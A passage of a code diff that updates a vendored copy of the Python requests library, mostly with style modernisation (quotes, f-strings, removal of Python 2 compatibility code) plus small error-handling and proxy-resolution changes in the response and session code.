         """Prepares the given hooks."""
@@ -591,14 +638,22 @@ def prepare_hooks(self, hooks):
             self.register_hook(event, hooks[event])
 
 
-class Response(object):
+class Response:
     """The :class:`Response <Response>` object, which contains a
     server's response to an HTTP request.
     """
 
     __attrs__ = [
-        '_content', 'status_code', 'headers', 'url', 'history',
-        'encoding', 'reason', 'cookies', 'elapsed', 'request'
+        "_content",
+        "status_code",
+        "headers",
+        "url",
+        "history",
+        "encoding",
+        "reason",
+        "cookies",
+        "elapsed",
+        "request",
     ]
 
     def __init__(self):
@@ -667,11 +722,11 @@ def __setstate__(self, state):
             setattr(self, name, value)
 
         # pickled objects do not have .raw
-        setattr(self, '_content_consumed', True)
-        setattr(self, 'raw', None)
+        setattr(self, "_content_consumed", True)
+        setattr(self, "raw", None)
 
     def __repr__(self):
-        return '<Response [%s]>' % (self.status_code)
+        return f"<Response [{self.status_code}]>"
 
     def __bool__(self):
         """Returns True if :attr:`status_code` is less than 400.
@@ -717,12 +772,15 @@ def is_redirect(self):
         """True if this Response is a well-formed HTTP redirect that could have
         been processed automatically (by :meth:`Session.resolve_redirects`).
         """
-        return ('location' in self.headers and self.status_code in REDIRECT_STATI)
+        return "location" in self.headers and self.status_code in REDIRECT_STATI
 
     @property
     def is_permanent_redirect(self):
         """True if this Response one of the permanent versions of redirect."""
-        return ('location' in self.headers and self.status_code in (codes.moved_permanently, codes.permanent_redirect))
+        return "location" in self.headers and self.status_code in (
+            codes.moved_permanently,
+            codes.permanent_redirect,
+        )
 
     @property
     def next(self):
@@ -732,7 +790,7 @@ def next(self):
     @property
     def apparent_encoding(self):
         """The apparent encoding, provided by the charset_normalizer or chardet libraries."""
-        return chardet.detect(self.content)['encoding']
+        return chardet.detect(self.content)["encoding"]
 
     def iter_content(self, chunk_size=1, decode_unicode=False):
         """Iterates over the response data.  When stream=True is set on the
@@ -753,16 +811,17 @@ def iter_content(self, chunk_size=1, decode_unicode=False):
 
         def generate():
             # Special case for urllib3.
-            if hasattr(self.raw, 'stream'):
+            if hasattr(self.raw, "stream"):
                 try:
-                    for chunk in self.raw.stream(chunk_size, decode_content=True):
-                        yield chunk
+                    yield from self.raw.stream(chunk_size, decode_content=True)
                 except ProtocolError as e:
                     raise ChunkedEncodingError(e)
                 except DecodeError as e:
                     raise ContentDecodingError(e)
                 except ReadTimeoutError as e:
                     raise ConnectionError(e)
+                except SSLError as e:
+                    raise RequestsSSLError(e)
             else:
                 # Standard file-like object.
                 while True:
@@ -776,7 +835,9 @@ def generate():
         if self._content_consumed and isinstance(self._content, bool):
             raise StreamConsumedError()
         elif chunk_size is not None and not isinstance(chunk_size, int):
-            raise TypeError("chunk_size must be an int, it is instead a %s." % type(chunk_size))
+            raise TypeError(
+                f"chunk_size must be an int, it is instead a {type(chunk_size)}."
+            )
         # simulate reading small chunks of the content
         reused_chunks = iter_slices(self._content, chunk_size)
 
@@ -789,7 +850,9 @@ def generate():
 
         return chunks
 
-    def iter_lines(self, chunk_size=ITER_CHUNK_SIZE, decode_unicode=False, delimiter=None):
+    def iter_lines(
+        self, chunk_size=ITER_CHUNK_SIZE, decode_unicode=False, delimiter=None
+    ):
         """Iterates over the response data, one line at a time.  When
         stream=True is set on the request, this avoids reading the
         content at once into memory for large responses.
@@ -799,7 +862,9 @@ def iter_lines(self, chunk_size=ITER_CHUNK_SIZE, decode_unicode=False, delimiter
 
         pending = None
 
-        for chunk in self.iter_content(chunk_size=chunk_size, decode_unicode=decode_unicode):
+        for chunk in self.iter_content(
+            chunk_size=chunk_size, decode_unicode=decode_unicode
+        ):
 
             if pending is not None:
                 chunk = pending + chunk
@@ -814,8 +879,7 @@ def iter_lines(self, chunk_size=ITER_CHUNK_SIZE, decode_unicode=False, delimiter
             else:
                 pending = None
 
-            for line in lines:
-                yield line
+            yield from lines
 
         if pending is not None:
             yield pending
@@ -827,13 +891,12 @@ def content(self):
         if self._content is False:
             # Read the contents.
             if self._content_consumed:
-                raise RuntimeError(
-                    'The content for this response was already consumed')
+                raise RuntimeError("The content for this response was already consumed")
 
             if self.status_code == 0 or self.raw is None:
                 self._content = None
             else:
-                self._content = b''.join(self.iter_content(CONTENT_CHUNK_SIZE)) or b''
+                self._content = b"".join(self.iter_content(CONTENT_CHUNK_SIZE)) or b""
 
         self._content_consumed = True
         # don't need to release the connection; that's been handled by urllib3
@@ -858,7 +921,7 @@ def text(self):
         encoding = self.encoding
 
         if not self.content:
-            return str('')
+            return ""
 
         # Fallback to auto-detected encoding.
         if self.encoding is None:
@@ -866,7 +929,7 @@ def text(self):
 
         # Decode unicode from given encoding.
         try:
-            content = str(self.content, encoding, errors='replace')
+            content = str(self.content, encoding, errors="replace")
         except (LookupError, TypeError):
             # A LookupError is raised if the encoding was not found which could
             # indicate a misspelling or similar mistake.
@@ -874,7 +937,7 @@ def text(self):
             # A TypeError can be raised if encoding is None
             #
             # So we try blindly encoding.
-            content = str(self.content, errors='replace')
+            content = str(self.content, errors="replace")
 
         return content
 
@@ -882,12 +945,8 @@ def json(self, **kwargs):
         r"""Returns the json-encoded content of a response, if any.
 
         :param \*\*kwargs: Optional arguments that ``json.loads`` takes.
-        :raises simplejson.JSONDecodeError: If the response body does not
-            contain valid json and simplejson is installed.
-        :raises json.JSONDecodeError: If the response body does not contain
-            valid json and simplejson is not installed on Python 3.
-        :raises ValueError: If the response body does not contain valid
-            json and simplejson is not installed on Python 2.        
+        :raises requests.exceptions.JSONDecodeError: If the response body does not
+            contain valid json.
         """
 
         if not self.encoding and self.content and len(self.content) > 3:
@@ -898,56 +957,65 @@ def json(self, **kwargs):
             encoding = guess_json_utf(self.content)
             if encoding is not None:
                 try:
-                    return complexjson.loads(
-                        self.content.decode(encoding), **kwargs
-                    )
+                    return complexjson.loads(self.content.decode(encoding), **kwargs)
                 except UnicodeDecodeError:
                     # Wrong UTF codec detected; usually because it's not UTF-8
                     # but some other 8-bit codec.  This is an RFC violation,
                     # and the server didn't bother to tell us what codec *was*
                     # used.
                     pass
-        return complexjson.loads(self.text, **kwargs)
+                except JSONDecodeError as e:
+                    raise RequestsJSONDecodeError(e.msg, e.doc, e.pos)
+
+        try:
+            return complexjson.loads(self.text, **kwargs)
+        except JSONDecodeError as e:
+            # Catch JSON-related errors and raise as requests.JSONDecodeError
+            # This aliases json.JSONDecodeError and simplejson.JSONDecodeError
+            raise RequestsJSONDecodeError(e.msg, e.doc, e.pos)
 
     @property
     def links(self):
         """Returns the parsed header links of the response, if any."""
 
-        header = self.headers.get('link')
+        header = self.headers.get("link")
 
-        # l = MultiDict()
-        l = {}
+        resolved_links = {}
 
         if header:
             links = parse_header_links(header)
 
             for link in links:
-                key = link.get('rel') or link.get('url')
-                l[key] = link
+                key = link.get("rel") or link.get("url")
+                resolved_links[key] = link
 
-        return l
+        return resolved_links
 
     def raise_for_status(self):
         """Raises :class:`HTTPError`, if one occurred."""
 
-        http_error_msg = ''
+        http_error_msg = ""
         if isinstance(self.reason, bytes):
             # We attempt to decode utf-8 first because some servers
             # choose to localize their reason strings. If the string
             # isn't utf-8, we fall back to iso-8859-1 for all other
             # encodings. (See PR #3538)
             try:
-                reason = self.reason.decode('utf-8')
+                reason = self.reason.decode("utf-8")
             except UnicodeDecodeError:
-                reason = self.reason.decode('iso-8859-1')
+                reason = self.reason.decode("iso-8859-1")
         else:
             reason = self.reason
 
         if 400 <= self.status_code < 500:
-            http_error_msg = u'%s Client Error: %s for url: %s' % (self.status_code, reason, self.url)
+            http_error_msg = (
+                f"{self.status_code} Client Error: {reason} for url: {self.url}"
+            )
 
         elif 500 <= self.status_code < 600:
-            http_error_msg = u'%s Server Error: %s for url: %s' % (self.status_code, reason, self.url)
+            http_error_msg = (
+                f"{self.status_code} Server Error: {reason} for url: {self.url}"
+            )
 
         if http_error_msg:
             raise HTTPError(http_error_msg, response=self)
@@ -961,6 +1029,6 @@ def close(self):
         if not self._content_consumed:
             self.raw.close()
 
-        release_conn = getattr(self.raw, 'release_conn', None)
+        release_conn = getattr(self.raw, "release_conn", None)
         if release_conn is not None:
             release_conn()
diff --git a/thirdparty/requests/packages.py b/thirdparty/requests/packages.py
index 00196bf..77c45c9 100644
--- a/thirdparty/requests/packages.py
+++ b/thirdparty/requests/packages.py
@@ -3,24 +3,26 @@
 try:
     import chardet
 except ImportError:
-    import charset_normalizer as chardet
     import warnings
 
-    warnings.filterwarnings('ignore', 'Trying to detect', module='charset_normalizer')
+    import charset_normalizer as chardet
+
+    warnings.filterwarnings("ignore", "Trying to detect", module="charset_normalizer")
 
 # This code exists for backwards compatibility reasons.
 # I don't like it either. Just look the other way. :)
 
-for package in ('urllib3', 'idna'):
+for package in ("urllib3", "idna"):
     locals()[package] = __import__(package)
     # This traversal is apparently necessary such that the identities are
     # preserved (requests.packages.urllib3.* is urllib3.*)
     for mod in list(sys.modules):
-        if mod == package or mod.startswith(package + '.'):
-            sys.modules['requests.packages.' + mod] = sys.modules[mod]
+        if mod == package or mod.startswith(f"{package}."):
+            sys.modules[f"requests.packages.{mod}"] = sys.modules[mod]
 
 target = chardet.__name__
 for mod in list(sys.modules):
-    if mod == target or mod.startswith(target + '.'):
-        sys.modules['requests.packages.' + target.replace(target, 'chardet')] = sys.modules[mod]
+    if mod == target or mod.startswith(f"{target}."):
+        target = target.replace(target, "chardet")
+        sys.modules[f"requests.packages.{target}"] = sys.modules[mod]
 # Kinda cool, though, right?
diff --git a/thirdparty/requests/sessions.py b/thirdparty/requests/sessions.py
index ae4bcc8..6cb3b4d 100644
--- a/thirdparty/requests/sessions.py
+++ b/thirdparty/requests/sessions.py
@@ -1,5 +1,3 @@
-# -*- coding: utf-8 -*-
-
 """
 requests.sessions
 ~~~~~~~~~~~~~~~~~
@@ -10,39 +8,52 @@
 import os
 import sys
 import time
-from datetime import timedelta
 from collections import OrderedDict
+from datetime import timedelta
 
+from ._internal_utils import to_native_string
+from .adapters import HTTPAdapter
 from .auth import _basic_auth_str
-from .compat import cookielib, is_py3, urljoin, urlparse, Mapping
+from .compat import Mapping, cookielib, urljoin, urlparse
 from .cookies import (
-    cookiejar_from_dict, extract_cookies_to_jar, RequestsCookieJar, merge_cookies)
-from .models import Request, PreparedRequest, DEFAULT_REDIRECT_LIMIT
-from .hooks import default_hooks, dispatch_hook
-from ._internal_utils import to_native_string
-from .utils import to_key_val_list, default_headers, DEFAULT_PORTS
+    RequestsCookieJar,
+    cookiejar_from_dict,
+    extract_cookies_to_jar,
+    merge_cookies,
+)
 from .exceptions import (
-    TooManyRedirects, InvalidSchema, ChunkedEncodingError, ContentDecodingError)
-
-from .structures import CaseInsensitiveDict
-from .adapters import HTTPAdapter
-
-from .utils import (
-    requote_uri, get_environ_proxies, get_netrc_auth, should_bypass_proxies,
-    get_auth_from_url, rewind_body
+    ChunkedEncodingError,
+    ContentDecodingError,
+    InvalidSchema,
+    TooManyRedirects,
 )
-
-from .status_codes import codes
+from .hooks import default_hooks, dispatch_hook
 
 # formerly defined here, reexposed here for backward compatibility
-from .models import REDIRECT_STATI
+from .models import (  # noqa: F401
+    DEFAULT_REDIRECT_LIMIT,
+    REDIRECT_STATI,
+    PreparedRequest,
+    Request,
+)
+from .status_codes import codes
+from .structures import CaseInsensitiveDict
+from .utils import (  # noqa: F401
+    DEFAULT_PORTS,
+    default_headers,
+    get_auth_from_url,
+    get_environ_proxies,
+    get_netrc_auth,
+    requote_uri,
+    resolve_proxies,
+    rewind_body,
+    should_bypass_proxies,
+    to_key_val_list,
+)
 
 # Preferred clock, based on which one is more accurate on a given system.
-if sys.platform == 'win32':
-    try:  # Python 3.4+
-        preferred_clock = time.perf_counter
-    except AttributeError:  # Earlier than Python 3.
-        preferred_clock = time.clock
+if sys.platform == "win32":
+    preferred_clock = time.perf_counter
 else:
     preferred_clock = time.time
 
@@ -61,8 +72,7 @@ def merge_setting(request_setting, session_setting, dict_class=OrderedDict):
 
     # Bypass if not a dictionary (e.g. verify)
     if not (
-            isinstance(session_setting, Mapping) and
-            isinstance(request_setting, Mapping)
+        isinstance(session_setting, Mapping) and isinstance(request_setting, Mapping)
     ):
         return request_setting
 
@@ -84,17 +94,16 @@ def merge_hooks(request_hooks, session_hooks, dict_class=OrderedDict):
     This is necessary because when request_hooks == {'response': []}, the
     merge breaks Session hooks entirely.
     """
-    if session_hooks is None or session_hooks.get('response') == []:
+    if session_hooks is None or session_hooks.get("response") == []:
         return request_hooks
 
-    if request_hooks is None or request_hooks.get('response') == []:
+    if request_hooks is None or request_hooks.get("response") == []:
         return session_hooks
 
     return merge_setting(request_hooks, session_hooks, dict_class)
 
 
-class SessionRedirectMixin(object):
-
+class SessionRedirectMixin:
     def get_redirect_target(self, resp):
         """Receives a Response. Returns a redirect URI or ``None``"""
         # Due to the nature of how requests processes redirects this method will
@@ -104,16 +113,15 @@ def get_redirect_target(self, resp):
         # to cache the redirect location onto the response object as a private
         # attribute.
         if resp.is_redirect:
-            location = resp.headers['location']
+            location = resp.headers["location"]
             # Currently the underlying http module on py3 decode headers
             # in latin1, but empirical evidence suggests that latin1 is very
             # rarely used with non-ASCII characters in HTTP headers.
             # It is more likely to get UTF8 header rather than latin1.
             # This causes incorrect handling of UTF8 encoded location headers.
             # To solve this, we re-encode the location in latin1.
-            if is_py3:
-                location = location.encode('latin1')
-            return to_native_string(location, 'utf8')
+            location = location.encode("latin1")
+            return to_native_string(location, "utf8")
         return None
 
     def should_strip_auth(self, old_url, new_url):
@@ -126,23 +134,40 @@ def should_strip_auth(self, old_url, new_url):
         # ports. This isn't specified by RFC 7235, but is kept to avoid
         # breaking backwards compatibility with older versions of requests
         # that allowed any redirects on the same host.
-        if (old_parsed.scheme == 'http' and old_parsed.port in (80, None)
-                and new_parsed.scheme == 'https' and new_parsed.port in (443, None)):
+        if (
+            old_parsed.scheme == "http"
+            and old_parsed.port in (80, None)
+            and new_parsed.scheme == "https"
+            and new_parsed.port in (443, None)
+        ):
             return False
 
         # Handle default port usage corresponding to scheme.
         changed_port = old_parsed.port != new_parsed.port
         changed_scheme = old_parsed.scheme != new_parsed.scheme
         default_port = (DEFAULT_PORTS.get(old_parsed.scheme, None), None)
-        if (not changed_scheme and old_parsed.port in default_port
-                and new_parsed.port in default_port):
+        if (
+            not changed_scheme
+            and old_parsed.port in default_port
+            and new_parsed.port in default_port
+        ):
             return False
 
         # Standard case: root URI must match
         return changed_port or changed_scheme
 
-    def resolve_redirects(self, resp, req, stream=False, timeout=None,
-                          verify=True, cert=None, proxies=None, yield_requests=False, **adapter_kwargs):
+    def resolve_redirects(
+        self,
+        resp,
+        req,
+        stream=False,
+        timeout=None,
+        verify=True,
+        cert=None,
+        proxies=None,
+        yield_requests=False,
+        **adapter_kwargs,
+    ):
         """Receives a Response. Returns a generator of Responses or Requests."""
 
         hist = []  # keep track of history
@@ -163,19 +188,21 @@ def resolve_redirects(self, resp, req, stream=False, timeout=None,
                 resp.raw.read(decode_content=False)
 
             if len(resp.history) >= self.max_redirects:
-                raise TooManyRedirects('Exceeded {} redirects.'.format(self.max_redirects), response=resp)
+                raise TooManyRedirects(
+                    f"Exceeded {self.max_redirects} redirects.", response=resp
+                )
 
             # Release the connection back into the pool.
             resp.close()
 
             # Handle redirection without scheme (see: RFC 1808 Section 4)
-            if url.startswith('//'):
+            if url.startswith("//"):
                 parsed_rurl = urlparse(resp.url)
-                url = ':'.join([to_native_string(parsed_rurl.scheme), url])
+                url = ":".join([to_native_string(parsed_rurl.scheme), url])
 
             # Normalize url case and attach previous fragment if needed (RFC 7231 7.1.2)
             parsed = urlparse(url)
-            if parsed.fragment == '' and previous_fragment:
+            if parsed.fragment == "" and previous_fragment:
                 parsed = parsed._replace(fragment=previous_fragment)
             elif parsed.fragment:
                 previous_fragment = parsed.fragment
@@ -194,15 +221,18 @@ def resolve_redirects(self, resp, req, stream=False, timeout=None,
             self.rebuild_method(prepared_request, resp)
 
             # https://github.com/psf/requests/issues/1084
-            if resp.status_code not in (codes.temporary_redirect, codes.permanent_redirect):
+            if resp.status_code not in (
+                codes.temporary_redirect,
+                codes.permanent_redirect,
+            ):
                 # https://github.com/psf/requests/issues/3490
-                purged_headers = ('Content-Length', 'Content-Type', 'Transfer-Encoding')
+                purged_headers = ("Content-Length", "Content-Type", "Transfer-Encoding")
                 for header in purged_headers:
                     prepared_request.headers.pop(header, None)
                 prepared_request.body = None
 
             headers = prepared_request.headers
-            headers.pop('Cookie', None)
+            headers.pop("Cookie", None)
 
             # Extract any cookies sent on the response to the cookiejar
             # in the new request. Because we've mutated our copied prepared
@@ -218,9 +248,8 @@ def resolve_redirects(self, resp, req, stream=False, timeout=None,
             # A failed tell() sets `_body_position` to `object()`. This non-None
             # value ensures `rewindable` will be True, allowing us to raise an
             # UnrewindableBodyError, instead of hanging the connection.
-            rewindable = (
-                prepared_request._body_position is not None and
-                ('Content-Length' in headers or 'Transfer-Encoding' in headers)
+            rewindable = prepared_request._body_position is not None and (
+                "Content-Length" in headers or "Transfer-Encoding" in headers
             )
 
             # Attempt to rewind consumed file-like object.
@@ -242,7 +271,7 @@ def resolve_redirects(self, resp, req, stream=False, timeout=None,
                     cert=cert,
                     proxies=proxies,
                     allow_redirects=False,
-                    **adapter_kwargs
+                    **adapter_kwargs,
                 )
 
                 extract_cookies_to_jar(self.cookies, prepared_request, resp.raw)
@@ -259,17 +288,18 @@ def rebuild_auth(self, prepared_request, response):
         headers = prepared_request.headers
         url = prepared_request.url
 
-        if 'Authorization' in headers and self.should_strip_auth(response.request.url, url):
+        if "Authorization" in headers and self.should_strip_auth(
+            response.request.url, url
+        ):
             # If we get redirected to a new host, we should strip out any
             # authentication headers.
-            del headers['Authorization']
+            del headers["Authorization"]
 
         # .netrc might have more auth for us on our new host.
         new_auth = get_netrc_auth(url) if self.trust_env else None
         if new_auth is not None:
             prepared_request.prepare_auth(new_auth)
 
-
     def rebuild_proxies(self, prepared_request, proxies):
         """This method re-evaluates the proxy configuration by considering the
         environment variables. If we are redirected to a URL covered by
@@ -282,24 +312,12 @@ def rebuild_proxies(self, prepared_request, proxies):
 
         :rtype: dict
         """
-        proxies = proxies if proxies is not None else {}
         headers = prepared_request.headers
-        url = prepared_request.url
-        scheme = urlparse(url).scheme
-        new_proxies = proxies.copy()
-        no_proxy = proxies.get('no_proxy')
+        scheme = urlparse(prepared_request.url).scheme
+        new_proxies = resolve_proxies(prepared_request, proxies, self.trust_env)
 
-        bypass_proxy = should_bypass_proxies(url, no_proxy=no_proxy)
-        if self.trust_env and not bypass_proxy:
-            environ_proxies = get_environ_proxies(url, no_proxy=no_proxy)
-
-            proxy = environ_proxies.get(scheme, environ_proxies.get('all'))
-
-            if proxy:
-                new_proxies.setdefault(scheme, proxy)
-
-        if 'Proxy-Authorization' in headers:
-            del headers['Proxy-Authorization']
+        if "Proxy-Authorization" in headers:
+            del headers["Proxy-Authorization"]
 
         try:
             username, password = get_auth_from_url(new_proxies[scheme])
@@ -307,7 +325,7 @@ def rebuild_proxies(self, prepared_request, proxies):
             username, password = None, None
 
         if username and password:
-            headers['Proxy-Authorization'] = _basic_auth_str(username, password)
+            headers["Proxy-Authorization"] = _basic_auth_str(username, password)
 
         return new_proxies
 
@@ -318,18 +336,18 @@ def rebuild_method(self, prepared_request, response):
         method = prepared_request.method
 
         # https://tools.ietf.org/html/rfc7231#section-6.4.4
-        if response.status_code == codes.see_other and method != 'HEAD':
-            method = 'GET'
+        if response.status_code == codes.see_other and method != "HEAD":
+            method = "GET"
 
         # Do what the browsers do, despite standards...
         # First, turn 302s into GETs.
-        if response.status_code == codes.found and method != 'HEAD':
-            method = 'GET'
+        if response.status_code == codes.found and method != "HEAD":
+            method = "GET"
 
         # Second, if a POST is responded to with a 301, turn it into a GET.
         # This bizarre behaviour is explained in Issue 1704.
-        if response.status_code == codes.moved and method == 'POST':
-            method = 'GET'
+        if response.status_code == codes.moved and method == "POST":
+            method = "GET"
 
         prepared_request.method = method
 
@@ -354,9 +372,18 @@ class Session(SessionRedirectMixin):
     """
 
     __attrs__ = [
-        'headers', 'cookies', 'auth', 'proxies', 'hooks', 'params', 'verify',
-        'cert', 'adapters', 'stream', 'trust_env',
-        'max_redirects',
+        "headers",
+        "cookies",
+        "auth",
+        "proxies",
+        "hooks",
+        "params",
+        "verify",
+        "cert",
+        "adapters",
+        "stream",
+        "trust_env",
+        "max_redirects",
     ]
 
     def __init__(self):
@@ -418,8 +445,8 @@ def __init__(self):
 
         # Default connection adapters.
         self.adapters = OrderedDict()
-        self.mount('https://', HTTPAdapter())
-        self.mount('http://', HTTPAdapter())
+        self.mount("https://", HTTPAdapter())
+        self.mount("http://", HTTPAdapter())
 
     def __enter__(self):
         return self
@@ -445,7 +472,8 @@ def prepare_request(self, request):
 
         # Merge with session cookies
         merged_cookies = merge_cookies(
-            merge_cookies(RequestsCookieJar(), self.cookies), cookies)
+            merge_cookies(RequestsCookieJar(), self.cookies), cookies
+        )
 
         # Set environment's basic authentication if not explicitly set.
         auth = request.auth
@@ -459,7 +487,9 @@ def prepare_request(self, request):
             files=request.files,
             data=request.data,
             json=request.json,
-            headers=merge_setting(request.headers, self.headers, dict_class=CaseInsensitiveDict),
+            headers=merge_setting(
+                request.headers, self.headers, dict_class=CaseInsensitiveDict
+            ),
             params=merge_setting(request.params, self.params),
             auth=merge_setting(auth, self.auth),
             cookies=merged_cookies,
@@ -467,10 +497,25 @@ def prepare_request(self, request):
         )
         return p
 
-    def request(self, method, url,
-            params=None, data=None, headers=None, cookies=None, files=None,
-            auth=None, timeout=None, allow_redirects=True, proxies=None,
-            hooks=None, stream=None, verify=None, cert=None, json=None):
+    def request(
+        self,
+        method,
+        url,
+        params=None,
+        data=None,
+        headers=None,
+        cookies=None,
+        files=None,
+        auth=None,
+        timeout=None,
+        allow_redirects=True,
+        proxies=None,
+        hooks=None,
+        stream=None,
+        verify=None,
+        cert=None,
+        json=None,
+    ):
         """Constructs a :class:`Request <Request>`, prepares it and sends it.
         Returns :class:`Response <Response>` object.
 
@@ -506,7 +551,7 @@ def request(self, method, url,
             ``False``, requests will accept any TLS certificate presented by
             the server, and will ignore hostname mismatches and/or expired
             certificates, which will make your application vulnerable to
-            man-in-the-middle (MitM) attacks. Setting verify to ``False`` 
+            man-in-the-middle (MitM) attacks. Setting verify to ``False``
             may be useful during local development or testing.
         :param cert: (optional) if String, path to ssl client cert file (.pem).
             If Tuple, ('cert', 'key') pair.
@@ -535,8 +580,8 @@ def request(self, method, url,
 
         # Send the request.
         send_kwargs = {
-            'timeout': timeout,
-            'allow_redirects': allow_redirects,
+            "timeout": timeout,
+            "allow_redirects": allow_redirects,
         }
         send_kwargs.update(settings)
         resp = self.send(prep, **send_kwargs)
@@ -551,8 +596,8 @@ def get(self, url, **kwargs):
         :rtype: requests.Response
         """
 
-        kwargs.setdefault('allow_redirects', True)
-        return self.request('GET', url, **kwargs)
+        kwargs.setdefault("allow_redirects", True)
+        return self.request("GET", url, **kwargs)
 
     def options(self, url, **kwargs):
         r"""Sends a OPTIONS request. Returns :class:`Response` object.
@@ -562,8 +607,8 @@ def options(self, url, **kwargs):
         :rtype: requests.Response
         """
 
-        kwargs.setdefault('allow_redirects', True)
-        return self.request('OPTIONS', url, **kwargs)
+        kwargs.setdefault("allow_redirects", True)
+        return self.request("OPTIONS", url, **kwargs)
 
     def head(self, url, **kwargs):
         r"""Sends a HEAD request. Returns :class:`Response` object.
@@ -573,8 +618,8 @@ def head(self, url, **kwargs):
         :rtype: requests.Response
         """
 
-        kwargs.setdefault('allow_redirects', False)
-        return self.request('HEAD', url, **kwargs)
+        kwargs.setdefault("allow_redirects", False)
+        return self.request("HEAD", url, **kwargs)
 
     def post(self, url, data=None, json=None, **kwargs):
         r"""Sends a POST request. Returns :class:`Response` object.
@@ -587,7 +632,7 @@ def post(self, url, data=None, json=None, **kwargs):
         :rtype: requests.Response
         """
 
-        return self.request('POST', url, data=data, json=json, **kwargs)
+        return self.request("POST", url, data=data, json=json, **kwargs)
 
     def put(self, url, data=None, **kwargs):
         r"""Sends a PUT request. Returns :class:`Response` object.
@@ -599,7 +644,7 @@ def put(self, url, data=None, **kwargs):
         :rtype: requests.Response
         """
 
-        return self.request('PUT', url, data=data, **kwargs)
+        return self.request("PUT", url, data=data, **kwargs)
 
     def patch(self, url, data=None, **kwargs):
         r"""Sends a PATCH request. Returns :class:`Response` object.
@@ -611,7 +656,7 @@ def patch(self, url, data=None, **kwargs):
         :rtype: requests.Response
         """
 
-        return self.request('PATCH', url, data=data, **kwargs)
+        return self.request("PATCH", url, data=data, **kwargs)
 
     def delete(self, url, **kwargs):
         r"""Sends a DELETE request. Returns :class:`Response` object.
@@ -621,7 +666,7 @@ def delete(self, url, **kwargs):
         :rtype: requests.Response
         """
 
-        return self.request('DELETE', url, **kwargs)
+        return self.request("DELETE", url, **kwargs)
 
     def send(self, request, **kwargs):
         """Send a given PreparedRequest.
@@ -630,19 +675,20 @@ def send(self, request, **kwargs):
         """
         # Set defaults that the hooks can utilize to ensure they always have
         # the correct parameters to reproduce the previous request.
-        kwargs.setdefault('stream', self.stream)
-        kwargs.setdefault('verify', self.verify)
-        kwargs.setdefault('cert', self.cert)
-        kwargs.setdefault('proxies', self.rebuild_proxies(request, self.proxies))
+        kwargs.setdefault("stream", self.stream)
+        kwargs.setdefault("verify", self.verify)
+        kwargs.setdefault("cert", self.cert)
+        if "proxies" not in kwargs:
+            kwargs["proxies"] = resolve_proxies(request, self.proxies, self.trust_env)
 
         # It's possible that users might accidentally send a Request object.
         # Guard against that specific failure case.
         if isinstance(request, Request):
-            raise ValueError('You can only send PreparedRequests.')
+            raise ValueError("You can only send PreparedRequests.")
 
         # Set up variables needed for resolve_redirects and dispatching of hooks
-        allow_redirects = kwargs.pop('allow_redirects', True)
-        stream = kwargs.get('stream')
+        allow_redirects = kwargs.pop("allow_redirects", True)
+        stream = kwargs.get("stream")
         hooks = request.hooks
 
         # Get the appropriate adapter to use
@@ -659,7 +705,7 @@ def send(self, request, **kwargs):
         r.elapsed = timedelta(seconds=elapsed)
 
         # Response manipulation hooks
-        r = dispatch_hook('response', hooks, r, **kwargs)
+        r = dispatch_hook("response", hooks, r, **kwargs)
 
         # Persist cookies
         if r.history:
@@ -689,7 +735,9 @@ def send(self, request, **kwargs):
         # If redirects aren't being followed, store the response on the Request for Response.next().
         if not allow_redirects:
             try:
-                r._next = next(self.resolve_redirects(r, request, yield_requests=True, **kwargs))
+                r._next = next(
+                    self.resolve_redirects(r, request, yield_requests=True, **kwargs)
+                )
             except StopIteration:
                 pass
 
@@ -707,16 +755,19 @@ def merge_environment_settings(self, url, proxies, stream, verify, cert):
         # Gather clues from the surrounding environment.
         if self.trust_env:
             # Set environment's proxies.
-            no_proxy = proxies.get('no_proxy') if proxies is not None else None
+            no_proxy = proxies.get("no_proxy") if proxies is not None else None
             env_proxies = get_environ_proxies(url, no_proxy=no_proxy)
             for (k, v) in env_proxies.items():
                 proxies.setdefault(k, v)
 
-            # Look for requests environment configuration and be compatible
-            # with cURL.
+            # Look for requests environment configuration
+            # and be compatible with cURL.
             if verify is True or verify is None:
-                verify = (os.environ.get('REQUESTS_CA_BUNDLE') or
-                          os.environ.get('CURL_CA_BUNDLE'))
+                verify = (
+                    os.environ.get("REQUESTS_CA_BUNDLE")
+                    or os.environ.get("CURL_CA_BUNDLE")
+                    or verify
+                )
 
         # Merge all the kwargs.
         proxies = merge_setting(proxies, self.proxies)
@@ -724,8 +775,7 @@ def merge_environment_settings(self, url, proxies, stream, verify, cert):
         verify = merge_setting(verify, self.verify)
         cert = merge_setting(cert, self.cert)
 
-        return {'verify': verify, 'proxies': proxies, 'stream': stream,
-                'cert': cert}
+        return {"proxies": proxies, "stream": stream, "verify": verify, "cert": cert}
 
     def get_adapter(self, url):
         """
@@ -739,7 +789,7 @@ def get_adapter(self, url):
                 return adapter
 
         # Nothing matches :-/
-        raise InvalidSchema("No connection adapters were found for {!r}".format(url))
+        raise InvalidSchema(f"No connection adapters were found for {url!r}")
 
     def close(self):
         """Closes all adapters and as such the session"""
diff --git a/thirdparty/requests/status_codes.py b/thirdparty/requests/status_codes.py
index d80a7cd..4bd072b 100644
--- a/thirdparty/requests/status_codes.py
+++ b/thirdparty/requests/status_codes.py
@@ -1,5 +1,3 @@
-# -*- coding: utf-8 -*-
-
 r"""
 The ``codes`` object defines a mapping from common names for HTTP statuses
 to their numerical codes, accessible either as attributes or as dictionary
@@ -23,101 +21,108 @@
 from .structures import LookupDict
 
 _codes = {
-
     # Informational.
-    100: ('continue',),
-    101: ('switching_protocols',),
-    102: ('processing',),
-    103: ('checkpoint',),
-    122: ('uri_too_long', 'request_uri_too_long'),
-    200: ('ok', 'okay', 'all_ok', 'all_okay', 'all_good', '\\o/', '✓'),
-    201: ('created',),
-    202: ('accepted',),
-    203: ('non_authoritative_info', 'non_authoritative_information'),
-    204: ('no_content',),
-    205: ('reset_content', 'reset'),
-    206: ('partial_content', 'partial'),
-    207: ('multi_status', 'multiple_status', 'multi_stati', 'multiple_stati'),
-    208: ('already_reported',),
-    226: ('im_used',),
-
+    100: ("continue",),
+    101: ("switching_protocols",),
+    102: ("processing",),
+    103: ("checkpoint",),
+    122: ("uri_too_long", "request_uri_too_long"),
+    200: ("ok", "okay", "all_ok", "all_okay", "all_good", "\\o/", "✓"),
+    201: ("created",),
+    202: ("accepted",),
+    203: ("non_authoritative_info", "non_authoritative_information"),
+    204: ("no_content",),
+    205: ("reset_content", "reset"),
+    206: ("partial_content", "partial"),
+    207: ("multi_status", "multiple_status", "multi_stati", "multiple_stati"),
+    208: ("already_reported",),
+    226: ("im_used",),
     # Redirection.
-    300: ('multiple_choices',),
-    301: ('moved_permanently', 'moved', '\\o-'),
-    302: ('found',),
